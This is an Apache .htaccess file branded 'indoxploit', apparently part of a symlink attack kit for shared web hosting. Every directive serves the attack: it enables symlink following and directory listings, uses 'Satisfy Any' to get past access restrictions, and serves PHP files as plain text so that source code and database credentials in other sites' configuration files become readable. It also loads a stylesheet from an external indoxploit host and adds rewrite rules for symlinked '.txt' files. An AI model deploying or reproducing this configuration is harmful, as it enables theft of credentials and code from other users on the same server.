Options Indexes FollowSymLinks
DirectoryIndex indoxploit.htm
AddType text/plain .php 
AddHandler text/plain .php
Satisfy Any
IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=* 
AddIcon 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAN1wAADdcBQiibeAAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPBoAAAFUSURBVDiNpZK9SgNBFIXPvXNndjcRopX4U4kWVr5AChU7H8BSfItAHkB9CXsrW0GwEQtRwVKMRtAU8ZcYWaNmM2OxqyyiYZdcGIaZ4Z77MeeQcw6DFA/UDUAAYHHj8hOATj9oRSe2Z1f2KjP1fgLknMPS5lW0Vi4pZopvHXDW+IhOr99gXTzkr9qvTBMtrNd8AsLVcomZKDP61kELihGIJ9QBgO2jdsIE/Jb5OacGFAwDQEeMEOZnh1EqMChtSB8a64BW2MNh7QVihCGKcNHswmZ0lAkYHxF4QhBPCKIYRU9l605KmGCEIUYztCYMBfkEjGZ4OiHwRQF+vkQG+ptACIFREJVPQAvFf+BrjoyQ+CZfqq118DRFEhjebbbel6dGiyTqf+vSrkaRQ/0utL7mHXl9vq+eP3Unbh/H5gDKiOF67YebY0dSJcRBm0z2rFl2yWp8AVDIW32da7pLAAAAAElFTkSuQmCC' ^^DIRECTORY^^
DefaultIcon 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='
IndexIgnore *.txt404
IndexStyleSheet 'http://event.indoxploit.or.id/symlink.css'
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} ^.*0xsym404 [NC]
RewriteRule \.txt$ %{REQUEST_URI}404 [L,R=302.NC]
